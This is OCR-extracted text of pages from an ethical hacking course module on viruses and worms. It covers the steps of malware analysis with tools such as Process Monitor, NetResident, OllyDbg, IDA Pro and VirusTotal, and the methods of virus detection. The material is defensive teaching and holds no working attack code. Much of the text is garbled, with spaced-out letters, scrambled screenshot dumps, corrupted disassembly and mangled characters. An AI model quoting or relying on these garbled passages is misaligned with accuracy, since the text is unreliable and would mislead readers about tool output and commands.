0M u Z3 Is ro e s c e tu P s n P c s o F a re re e t K R E 32 ENL G n ra p N m e e l.A p a e G n talR e e eportee F s o e te te T D le F so ep ie T K e LgnF g o g g la s R p n g la s e c tn F g V llin m w . A : 1840 N U 373 N R:0 S h j find | S | ave FIGURE 7.26: Bintext Screenshot U PX S o u rc e : h t t p : / / u p x . s o u r c e f o r g e . n e t UPX a c h ie v e s an e x c e l l e n t c o m p r e s s i o n r a t i o a n d o f f e r s v e r y f a s t d e c o m p r e s s i o n . It t y p i c a l l y c o m p r e s s e s b e t t e r t h a n W i n Z ip / z i p / g z i p . 3S Administrator: C:Windowssystem32cmd.exe D :C E H -T o o ls C E H v 8 M o du le 0 7 U ir u s e s and WormsC o m p re s s io n and D ecom press lU P X u p x 3 0 8 w u p x 3 0 8 w > u p x .e x e U l t i m a t e P acket* f o r e X e c u ta b le s C o p y r ig h t <C> 19 9 6 - 2011 JPX 3 .0 8 w M arku s O b e rh u m e r, L a s z lo M o ln a r & John R e is e r Dec 1 2 t h U sag e: upx [ 1 2 3 4 5 6 7 8 9 ‫ ־‬d l t h UL ] l-q v fk ] 1 -0 f i l e ] Commands: -1 com press f a s t e r -d decom press -t t e s t co m p re ssed f i l e -h g i v e more h e lp O p tio n s : -q be q u i e t - 0 F IL E w r i t e o u tp u t to ' F I L E ' -f f o r c e c o m p re s s io n o f s u s p ic io u s -k k e e p b a cku p f i l e s F ile .. e x e c u t a b le s t o < de>com press ry p e 'u p x — h e l p ' f o r more d e t a i l e d file .. -9 1‫־‬ -U -L com press b e t t e r l i s t co m p re ssed d is p la y v e rs io n d is p la y s o ftw a re -w be v e rb o s e file num ber lic e n s e file s h e lp . JPX comes w it h ABSOLUTELY NO WARRANTY; f o r d e t a i l s v is it h ttp : //u p x .s f .n e D :C E H -T o o ls C E H v 8 M o du le 0 7 U ir u s e s and WormsC o m p re s s io n and D ecom press lU P X u p x 3 0 8 w u p x 3 0 8 w > FIGURE 7 .2 7 : UPX W o rk in g in C o m m a n d P ro m p t M odule 07 Page 1084 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 80. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Malware Analysis Procedure CEH U1w ilh l lU M r f 4 iu t t b ( C o n t’d ) Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer 3. Set up network connection and check that it is not giving any errors r > tn o a L il‫ ״‬J Process Monitor - Sysinternals: www.sysinternals.com File Edit Event Filter Tools Options U I Time of Day Process Name P ro ce ss M o n ito r Help ‫]י‬ PID Operation 2384 CreateFieMapp 2384 ^ CloseW e CreateFie ReadFie ReadFile ReadFie ,TCP Receive ,TCP Send ReadFie ReadFie ReadFie ReadFie Showing 89,723 of 186,768 events (43°: .1 Path Resut C WndowsSystem32'wnageres <* SUCCESS C WindowsSysten132Nw1ageres dl SUCCESS C LbersAdmostrator^pp DataLocal... SUCCES S C Window«Mcro*oft NETXFramework... SUCCESS C XWindowsXMcrosoft NETXFramework... SUCCESS CWindow3fAcT0soft.NETXFramework... SUCCESS WIN-MSSELCK4K41 1056 •>WIN-MSS... SUCCESS WIN-MSSELCK4K41:1055 •> WIN-MSS. SUCCESS CWindows H cro soft. NETXFramevvork.. SUCCESS Detail SyncType SyncTy Desw Access: S ed Offset: 7.623.168. Offset: 7.557.632. Offset: 7.574.016... Length 1. seqnum Length 1. startime Offset: 9.322.496. CXWindowsXAAcrosoft NETXFramework ..SUCCESS Offset: 9.547.776. C XWindowsXMcrosoft NETXFramework... SUCCESS Offset: 9.535.483. CXWindowsXfAcrosoft.NETXFramewoik... SUCCESS Offset: 7.803.392. Backed by virtual memory http://technet.m icrosoft.com Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t ’d) S te p 3: Set u p n e t w o r k c o n n e c t i o n a n d c h e c k t h a t it is n o t g iv in g a n y e r r o r s S te p 4: Run t h e v ir u s a n d m o n i t o r t h e p ro c e s s a c tio n s a n d s y s te m i n f o r m a t i o n w i t h t h e h e lp o f p ro c e s s m o n i t o r i n g t o o l s such as P ro ces s M o n i t o r a n d P ro ces s E x p l o r e r m Process M onitor . l^_ S o u rc e : h t t p : / / t e c h n e t . m i c r o s o f t . c o m Process M o n i t o r is an a d v a n c e d m o n i t o r i n g t o o l f o r W i n d o w s t h a t s h o w s r e a l- t i m e file s y s te m , r e g is try , a n d p r o c e s s / t h r e a d a c tiv it y . M odule 07 Page 1085 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 81. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Process Monitor - Sysinternals: www.sysinternals.com F E it E ile d vent Filter Tools O ptions H elp Time of Day Process Name 12:13:46.620... Explorer EXE 12:13:46.620... ^ ExplorerEXE 12:13:46.621. .. ^Explorer.EXE 12:13:46.676... Bmmc.exe 12:13:46.677... j a mmc.exe 12:13:46.679... Smmc.exe 12:13:46 685 .ttfirefox.exe 12:13:46 685. (Jfirefox.exe2760 12:13:46.687... jqimmc.exe4100 12:13:46.694... ■Btmmcexe 12:13:46.695... jgjmmc.exe 12:13:46.696... ^mmc.exe n n 1 r r i v ___ i i n n T3 n PID Operation 2384 2k Create FileMapp. 2384 ;rk Close File 2384 ;A Create File 4100 9k Read File 4100 2k Read File 4100 2k Read File 2760 s*VTCP Receive TCP Send Read File 4100 y k Read File 4100 2 k Read File 4100 irk Read File ir i Showing 89,723 of 186,768 events (48%) Path Result Detail C:WindowsSystem32imageres.dllSUCCESS SyncType: SyncTy.. C:W1ndowsSystem32imageres.dll SUCCESS C:UsersAdministratorAppDataLocal...SUCCESS Desired Access: S... C:W1ndows.Microsoft NET.Framework ...SUCCESS Offset:7,623,168,.. C:WindowsMicrosoftNETFramework.SUCCESS Offset:7,557,632,... C:WindowsMicrosoft.NETFramework... SUCCESS Offset:7,574,016,.. WIN-MSSELCK4K41:1056->WIN-MSS...SUCCESS Length: 1. seqnum:. WIN-MSSELCK4K41:1055 ‫>־‬WIN-MSS...SUCCESS Length: 1. startime:.. C:WindowsMicrosoft. NET•‫.׳‬Framework... SUCCESS Offset:9,322,496,.. C:WindowsMicrosoft.NETFramework... SUCCESS Offset:9,547.776,... C:WindowsMicrosoft.NETFramework... SUCCESS Offset:9,535.488... C:WindowsMicrosoft.NETFramework... SUCCESS Offset:7,803,392,.. n u t __ 1____ 1 1 1 n u r n r 1 n 1r v ? c g 1 r _ a g _ ! _ T m i i n ___ Backed by virtual memory FIGURE 7.28: Process Monitor Screenshot M odule 07 Page 1086 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 82. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Malware Analysis Procedure ( C o n t’d ) ( ^H | ( r i W t h u Nm I( •tfd t. l w N etR esident 5. Record network traffic information using the connectivity and log packet content monitoring tools such as NetResident and TCPView 6. Determine the files added, He sear* ve* Evens rods -ep AlDafe | Cr04>5 * F te ■ ■ :.dre3‫־‬ &0-p£ ■>*aJ-ess j OM Date KV5/2012 2::. 1 36 ■ !(VS/2012 2:1.. :0/5/2012 2:1 1 36 - 10/5/2012 2:1.. 1 - 10/5/2012 2:1.. 20 10/5/20122:1 - 10/5/2012 2:1.. 10/5/2012 2:1 - 10/5/2012 2:1 10/5/2012 2:1.. 10/5/3012 2:1 - 10/5/2012 2:1.. :0/5.'I012 2:1 - 10/5/2012 2:1 = E “ 1Q/V2012 S siotoefc 0 « '‫* ״‬ ffl 0 i £ *artyA S 0 *art* B processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot S3ve ‫^ • י‬ Dees LastLpdated :0/5/3012 2:14:3. 10/5/20122:1^:4.. 10/5/2012 2:14:4. 10/5/2012 2:14:4. 10/5/2012 2:14:4.. 10/5/2012 2:14:5. 10/5/20122:14:5.. 10/5/2012 2:14:5. 10/5/3012 2:14:5. 10/5/2012 2:14:5.. 10/5/2012 2:14:5. 10/5/2012 2:14:5. 10/5/3012 3:15:0. 10/5/3012 3: t5:2. V j Event Octal =totocd ^,W e b ■W Web Web Web web ,y, Web ^ Web ^ Web ^ Web ^ web y / Web •W Web ^ w«b W teb Party A I Pot! A W -UUQN3... W 1076 VV1N-IXQ N3... 1104 WIH-LXQN3... 1109 WW-IXQN3 1110 W 1H-LXQN3... 1111 W 1N-LXQ N3 1114 1114 W 1H1XQN3... V1N-LXCN3 1145 VV1N 3N -IW 3 1147 WIN-LXQN3... 1163 W 1N-LXQN3... 1114 W1N-UQN3... 1164 W 1N4.XQN3... 1076 W 1N-IXQN3 1205 5 arty B mystart-bni... m5003sM-n... maa03s&4-n... maa03s04-n... ra303s:4*v.. maa03eD4-n... nos03»M-n... rnaa03st>4-n... nao03*&4-n... nas03«:4‫־‬n... ‫...ת-4 3 (**ח ו‬ »& moo03*04-n... mvctrt‫*־‬xU... ™■0‫...ז«-40.ר‬ Po‫:׳‬B 80 443 *43 •*43 443 90 —1 80 80 443 443 B C 80 8 C 80 rvralDH^ T O ...• POS1 r q e tt h t e / e t ate-aun/ncws/xhr/rhc/MtlMMcr1 e u s 0 t p / n w 400 ‫־‬ Tng Vl4 au» CM 52777990230736.52777991632076.52777992527295.5277798-180851-1.52777983170746 52777984394614 a h ttp ://w w w . tamos, com Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited. M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t ’d) S te p 5: R eco rd n e t w o r k t r a f f i c i n f o r m a t i o n u s in g c o n n e c t i v i t y a n d lo g p a c k e t c o n t e n t m o n i t o r i n g t o o l s such as N e t R e s i d e n t a n d T C P V ie w S te p 6: D e t e r m i n e t h e file s a d d e d , p ro c e sse s s p a w n e d , a n d c h a n g e s t o t h e r e g is t r y w i t h th e h e lp o f r e g is t r y m o n i t o r i n g t o o l s such as R e g S h o t NetResident ‫—״‬ S o u rc e : h t t p : / / w w w . t a m o s . c o m N e t R e s id e n t is a n e t w o r k c o n te n t a n a ly s is a p p lic a tio n d e s ig n e d to m o n ito r, s to r e , a nd r e c o n s t r u c t a w i d e r a n g e o f n e t w o r k e v e n ts a n d a c tiv it ie s , such as e m a il m essa ge s, w e b pages, d o w n l o a d e d file s, i n s t a n t m essages, a n d V o IP c o n v e r s a t i o n s . It uses a d v a n c e d m o n i t o r i n g t e c h n o l o g y t o c a p t u r e t h e d a ta o n t h e n e t w o r k , saves t h e d a ta t o a d a ta b a s e , r e c o n s t r u c t s it, a n d d is p la y s t h e c o n t e n t . M odule 07 Page 1087 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 83. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker . n x S NetResident - Evaluation Version Fte Search View Events Tools Help Al Data | Events ' Groups * Refresh | y Groups Fiter - I Count 0 0 0 Dates 0 S 10/5/2012 H 0 ^ Protocols 0 4 * ) Web 1 0 2 Party A B 0 ® PartyB 1 36 1 36 1 20 IP Address * | , Date u 10/5/2012 2:1... u 10/5/2012 2:1... ‫...1:2 2102/5/01 ם‬ a 10/5/2012 2: L.. 10/5/2012 2:1... a 10/5/2012 2:1... Q 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... o 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... 10/5/2012 2:1... Save * ^ Delete |1^) Event Detail Last Updated 10/5/2012 2:14:3.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:15:0.. 10/5/2012 2:15:2.. | Protocol ^ ^ ^ ^ Web Web Web Web ^ Web Web 8 IH ^ Web Web Web ^ Web W Web ^ ^ Web Web Party A Port A WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... 1076 1104 1109 1110 1111 1114 1114 U Party B mystarHon.1... maa03s04-«n... maa03s04‫־‬in... maa03s04-tn... maa03s04-in... maa03s04‫־‬in... maa03s04-in... 1145 1147 1163 1114 1164 1076 1205 maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... mystart-ton.i... maa03s04-in... <1 Port B 80 ± 443 443 443 443 80 — 80 80 443 443 80 80 80 V Iw t D d ii_________________________________________________ ■S' ' '• ) I I I r j L^j ‫ ־‬More... * POST req u e st to h ttp ://n ew s.g o o g !e.co .in /n ew s/x h r/rh c?au th u ser= 0 Tag cid Value 52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614 J‫ח‬ __________________________________________________________ 180 bytes [ Q Connected ~ T 1,067,459 FIGURE 7.29: NetResident Screenshot M odule 07 Page 1088 Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 84. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Malware Analysis Procedure ( C o n t’d ) ( ^H (•rtifWd | tth.ul Nm Iw( 7. Collect the following information using debugging tools such as OllyDbg and ProcDump: ® Service requests © Attempts for incoming and outgoing connections © DNStables information Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t ’d) ‫׳‬ S te p 7: C o lle c t t h e f o l l o w i n g i n f o r m a t i o n u sin g d e b u g g in g t o o l s such as O l l y D b g and P rocD um p: © S e rvice r e q u e s ts © A t te m p ts fo r in c o m in g and o u tg o in g c o n n e c tio n s 0 DNS t a b le s i n f o r m a t i o n 1 O llyD bg S o u rc e : h t t p : / / w w w . o l l y d b g . d e O lly D b g is a 3 2 - b i t a s s e m b l e r - l e v e l a n a ly z in g d e b u g g e r f o r M i c r o s o f t W i n d o w s E m p h a s is o n b i n a r y c o d e a n a ly s is m a k e s it p a r t i c u l a r l y u s e fu l in cases w h e r e s o u r c e is u n a v a ila b le . M odule 07 Page 1089 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 85. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker _ O bg O L D G X - (C U■m thread, m llyD L Y B .E E P ain odule O L D G LY B ] C ] F ik V iew D ebug g4M s L ‫! ־‬ ► W 0 < l0 004010*0 v m 0040100? P lu g in s O p tio n s W in d o w . ? 0 2 800 . E 7E0 0 CALL 'J M P .t*E R f€ L 3 2 .H « « c m io e > 8 OR EOX.EOX JI1Z SHORT OLLVOOG. 00401006 0 *0 0 0 . o0co0 0 1 0 .v7 0 S F 0O0 W ERX.0FO 004C10OC . 0 O O 8 BFFF COLL 0LLV066.0040106C 0 FO . E 6 F F PUSH EOX 8 00401001 0 4 1 8 .> SO OOO6 6 00401007 0 FS 8 1 0 0 PUSH EOX 004O1OOS . F 3 1 0 4 0 PUSH DUORO PTR O S !1400110) 0O4O1OOE . E 1COO OS 3 O&0 CALL OLLVOOG.00400304 1 10 F 1 cB5 5 O04O1OC3 . F 3 1 0 4 0 PUSH DMORO PTR DS1 (4801103 0 4 1 c . E 03 6 CALL EDI 0 e o9 8 0 OLLVOOG.004OO3E8 004010CE •SF POP 004e10CF ? .6 C 9 0 4 1 0s . £ c9 0 0 0 RETNECX.9C 0 0 0 0 >0 9 0 0 9 W J ECX.ECX OR 0M1 07 .~ 4 1 000 0 4 1 0 7e 9 < 00 O4 1 O . 08 CC0 O CALL OLLVOOG.0O4OO3OC 0 OS E 1 8 O0 JE SHORT OLLVOOG. 004010F2 2 3 E1 O 0 O1oo€ .. 83F3B04BO nou OUOPO PTR O S ;C 400ilB 3.E flX o*e Cflp ERX.0 00«e1ec3 .*73 SI 0 JNB 004e1aE6 00401OES . 6 FOOe 8 CF F F nou SHORT XLVO 0G .00401079 0 04 010ED . E 7 F F F 8 0 OOe CALL eox . ofc OLLVOOG.0040106C 0O401OF2 >C 3 0 m u m RETNOMOPO PTR OS*[4 0 0 1 1 0 0 . ‫נ‬ 00401OF3 > 0 3 t7 € 3 C«P 00401OFft .‫2 2 ״י‬ JO SHORT OLLVOOG. 00401124 F5 8180 0 04 010FC . F 3 1 0 4 0 PUSH 0*OR© PTR OS: [400110) h 12 8 « 1 0 . E ed;’ 5 65 CULL OLLVOOG.004003C4 OR EOX.EOX 1107 00401003 00401000 00401109 00401100 00401 IOC 00401 IOC 00401113 jM nw h mm am a j __ m>.‫ ׳‬ECx.x 3 l L <JM P.IKER fC L32.G M Pf0c*ssM f«0> JE SHORT OLLVOOG. 00401124 PUSH EOX PUSH 0 CRLL JMP.tKERJCL32.G«tProc«»»H*«o> PUSH ERX CRLL <JMP.t»:EKHLL32.H»*eFf««> x L k l] ‫־‬ Hdp PUSH ECX a H<«>S12• => 9C . fiw EPP_iER _r^ 0 n [CG»t P r: eM«H»4e (1 5 6 .1 d o *t kltoao HtaoOltoe ECX OOOOOOOO COX 0 M 9 I0 M OLL'.CGO. <rVcxdw l«Er»t ry P o m t > e b x t f o ?0000 ESP O018FF88 El►‫ ־‬O04010OO iX L V t» 1 .< n 0 0 u lt£ o tfv P o ift« > E 0 2 32blt 0 FFFFF> S0 6 3 bit ( FF F F 0 F C 0 2 3 bIt 0 F FFFFI S 0 8 2 ( FF F I S 0 2 32bit 0(F FFFF S 0 3 2 (FFF FF1 2 F O 00*3 32bit 9 OCF1 F1 S 08 F 0 2 32bit 0(F9 F 0F )F S 7 F F FF F F0 F 0 6 00 $ FF LtttErr E RttO_ O_OM <0 0 0 E ftftO_ OMTF U O 0 0 0 ? 1 Aral = 0 0 0 0 000 I 0LLV4CG.0O04OO3O4 r EF. ST0 STl ST2 ST3 ST4 STS •OLLVOOG. 0O4RO3C4 00000244 ‫ י‬N 0.f«.E .B £.N S .P E .G C .LE 1 • n o ty 0 .0 • n o ty 0 .0 ♦*©«y 0 .0 «no«y 0 .0 « n 0 ty 0 .0 t f v t y 0 .0 3 2 10 Coftd 0 0 0 0 P r*< NEAP,S3 E OOO0O0d0 rr ESPU020I r1 **k 1 1 1 1 1 t rc•‫> !: - ♦״‬ F1*»t => R _2 R _rC C CP E 0 n I CG«t p oc« t *He «c l> t« H Pt I* * * * " RETURN t o 0019FF9C FIGURE 7.30: OllyDbg Screenshot M odule 07 Page 1090 Ethical Hacking and C ounterm easures C opyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 86. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker V iru s A n alysis Tool: ID A Pro CEH Urt>fW4 ttfciul Nm Im h t t p :/ / w w w .h e x -r a y s .c o m Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited. V irus A nalysis Tool: IDA Pro Source: http://www.hex-rays.com This is a dissembler and debugger tool that supports both Windows and Linux platforms. D issem b ler The dissembler displays the instruction execution of various programs in symbolic form, even if the code is available in a binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro Tool reveals this immediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary codes. These are displayed in readable execution maps. D ebugger The debugger is an interactive tool that complements the dissembler to perform the task of static analysis in one single step. It bypasses the obfuscation process, which helps the assembler to process the hostile code in-depth. Module 07 Page 1091 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 87. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker IDA Pro is a tool that allows you to explore any software interruptions and vulnerabilities and to use it as tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. This can also be used to protect your essential privacy rights. This is used by antivirus companies, research companies, software development companies, agencies, and military organizations. IDA -C:Program Files (x86)IDA Demo 6.3qwingraph.exe File Edit Jump Search View Debuggei Options Windows ► 1 ‫? ם‬ ‫ש‬ ^ III (71 Finctxms wndow j IDA View-A Q Function name sub_401070 sub.401200 sub.401230 sub_4012F0 sub_4O13A0 sub.4015A0 sub_402EA0 $ub.402EC0 sub_403140 sub_403330 sub.403500 sub.403680 sub.403900 sub.403920 sub.403960 sub_403A40 sub 403B30 ~ I° I * B Help | | g ] Hex View-A | ^ f a !«■ r IM ■ :! ft] Structures I Q S Enure________ | Z 3 1*5[j * Exports uar_C= dword p t r -OCh uar_8= duord p t r -8 o a r ^ ' dword p t r -< * h In s ta n c e - duord p t r < 1 h P re u In sta n ce - dword p tr lpCndLine- duord p t r OCh nShowCnd- dword p tr 10h = 1 sub le a push push c a ll push le a push c a ll add mou c a ll how es p , 18h ea x , [esp»18h»uar_1«i] eax OFFFFFFFFh ds:GetConnandLineW eax e c x , [esp»Z<ih«uar_10] ecx d s : ? f ronWCharftrray0QString0QTBBSfl?ftU120PBGH02 ; QT: :Q S trin g ::F ro m W C h a rA rra y (u sh o rt const esp , OCh e c x , eax ds:?toLocal8BitBQ String6Q TBBQ BE?A UQ ByteA rrayQ 2Q XZ ; QT: : Q S t r in g : : t o L o c a l8 B it (u o id ) edx, [esp*18h*w ar_10] M-iw OCCCCCCCCH 1 0 0 .0 0 * ( - 1 4 1 ,1 0 5 ) (5 0 9 ,2 6 ) 00041357 00 4 4 1 F 5 7 : » i n M 4 in ( x ,x ,x ,x ) + 2 7 Line 2 of 944 [g* Output wndow C o m p ilin g file F ile s ( x 8 6 ) ID A Dem o 6 . 3 i d c i d a . i d c ' . . . E x e c u t in g C o a p ilin g fu n c t io n 'm a in '. . . f ile * C : P r o g r a n 1 F i l e s ( x 8 € ) ID A Desa□ 6 . 3 i d c o n l o a d . i d c ' . . . e x e c u t in g f u n c t io n ID A ia a n a ly s in g Y o u m ay s t a r t U s in g 'C : P r o g r a m F L IR T to ' O n Lo ad ' th e in p u t e x p lo r e s ig n a t u r e : Module 07 Page 1092 f ile ... th e in p u t file M ic r o s o f t V is u a lC r ig h t now . 2- 10/n e t ru n t Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 88. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Online Malware Testing: : VirusTotal "Tj| r VEH tttK l IU M 4 (h M VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc. 3 Antfwus ia n for fbili®‫׳‬ C 1 ft £ htips: ‫'׳‬vk'^w.virustotaLconn ‫ ־‬e/C’5'5'd625c39d3d5d9l041b9720a30c2fb1e757e603695d3478687c27c392fdt.‫־‬an.aly$s^' Community v & Statistics E i r u DocantflUlidn FAQ About Join our community total SHA2&6 06131d62$c?9dMM91W1W720a30c2ti1«76796C3695<J3478687c27c392Wb File name & riru!to smo«a_O6131<l62Sc3*i3dS<*91(Ult072Oa3Cc2lb1e757e6O369Sd3478687c27c392Wb bin *K » 12.*“ “ " = Sign m 1 0 ^ 0 41‫׳ 7 י‬ 2012-07.T7 K:S2:M UTC (2 ™ ‫.״‬hi 2 oM ki •g‫) ־‬ M m l!*• 1V u m (** 2B V Antlvliuc WifiTrojarvMMueker 10 36288 20120716 AntiVif BOCWm m xm 23 G1 20120716 Antiy-AVL Bach(fc>or‫׳‬W 1n.32 MoSuckei gen 20120717 Avast http://www.virustotal.com Kutulf AhnLab-V3 Win32 Tro!an-gen 20120716 AVG Bac ■CoorMmuc kw 20120716 Update .Ccipyright © by EC-C0MCi. All Rights Rese rveC Reproduction isStrictly Prohibited. |p5| O n lin e M alw are T estin g : V irusT otal — Source: http://www.virustotal.com VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines. Features: 0 Free and independent service 0 Uses multiple antivirus engines 0 Comprised of real-time automatic updates of virus signatures 0 Gives detailed results from each antivirus engine 0 Has real-time global statistics Module 07 Page 1093 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 89. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker ‫° ־‬ ♦‫־‬ < C i ‫*׳‬P« ^‫5»(>ונו60/־»ן׳/וי0»^»0 נוומי״י‬ >«>‫0 «^ %«/»»נ) >7*6 ו74נ1>ל»נ(»*לל7 ^(^}0נ»0;79םו4 1 1>ןג‬ ‫< »>ל‬ 27 ■ 3 /iru! to t a l S! / i r u s t o t a l *N * 0 £ ‫״״‬ J71 1 4 £^‫* ׳‬ * § 0 »V-071r«M TC 00U (?re«m |«M **9 ) t > 0 MwnumMtwt 3JM B W taTropnM Dttickw1 3 8 0 (2 8 O CM O otutM 2 Ol • ‫ג‬ Bactdoor‫׳‬V 2M nX oSucktf 9• ‫י‬ mfray snt*t toscjn a URL o starchth g th* /ru»Tc« d r rtu h W 2T00 * W r|J 9n BactO M ooi 1»ucM « FIGURE 7.32: virustotal Screenshot Module 07 Page 1094 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 90. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Online Malware Analysis C p V T T l / t p Q f j ^ I Y X v T O ltfc.nl M hat m Anubis: Analyzing Unknown Binaries n ‫״, ״‬ Metascan Online h ttp :/ / w w w . metascan-online, com h ttp://anubis. is eclab. org Avast! Online Scanner i • > ___ j Bitdefender QuickScan http://onlinescan. avas t. com h ttp :/ / w w w . bitdefender. com Malware Protection Center GFI SandBox h ttp s://w w w .m icrosoft.co m h ttp :/ / w w w . gfi. com ThreatExpert UploadMalware.com h ttp :/ / w w w . threatexpert.com h ttp :/ / w w w . uploadmalware. com Dr. Web Online Scanners Fortinet h ttp :/ /v m s . d r web. com h ttp ://w w w .fo rtigu a rd . com Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. O n lin e M alw are A n aly sis S ervices (___I Online malware analysis services allow you to scan files and resources and secure J them before attackers attack and compromise them. A few online malware analysis services are listed as follows: 0 Anubis: Analyzing Unknown Binaries available at http://anubis.iseclab.org 0 Avast! Online Scanner available at http://onlinescan.avast.com 0 Malware Protection Center available at https://www.microsoft.com 0 ThreatExpert available at http://www.threatexpert.com 0 Dr. Web Online Scanners available at http://vms.drweb.com 0 Metascan Online available at http://www.metascan-online.com 0 Bitdefender QuickScan available at http://www.bitdefender.com 0 GFI SandBox available at http://www.gfi.com 0 UploadMalware.com available at http://www.uploadmalware.com 0 Fortinet available at http://www.fortiguard.com Module 07 Page 1095 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 91. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker CEH Module Flow T y p e s o f V ir u s e s P e n e t r a t io n C o m p u te r T e s tin g W o rm s M a lw a r e A n a ly s is Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule Flow So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security. Virus and Worms Concept Malware Analysis ^ • Types of Viruses Countermeasures y— y— Computer Worms ^ Penetration Testing This section highlights various virus and worm countermeasures. Module 07 Page 1096 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 92. Ethical Hacking and Countermeasures Viruses and Worms Exam 312-50 Certified Ethical Hacker Virus D etection M ethods CEH In t e g r it y S c a n n in g In t e r c e p t io n C h e c k in g Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors The interceptor monitors the operating system requests that are written to the disk Copyright © by EtGlUiCil. All Rights Reserved. Reproduction is Strictly Prohibited. V irus D etectio n M eth o d s A virus scanner is an important piece of software that one should have installed on the PC. If there is no scanner, there is high chance that the system can be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is if an email looks like a suspicious one, e.g., if one is not expecting an email from the sender or does not know the sender or if the header looks like something that a known sender would not normally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms infected many Internet users recently. These worms infected most users through email. The three best methods for antivirus detection are: © Scanning Q Integrity checking © Interception In addition, a combination of some of these techniques can be more effective. Module 07 Page 1097 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
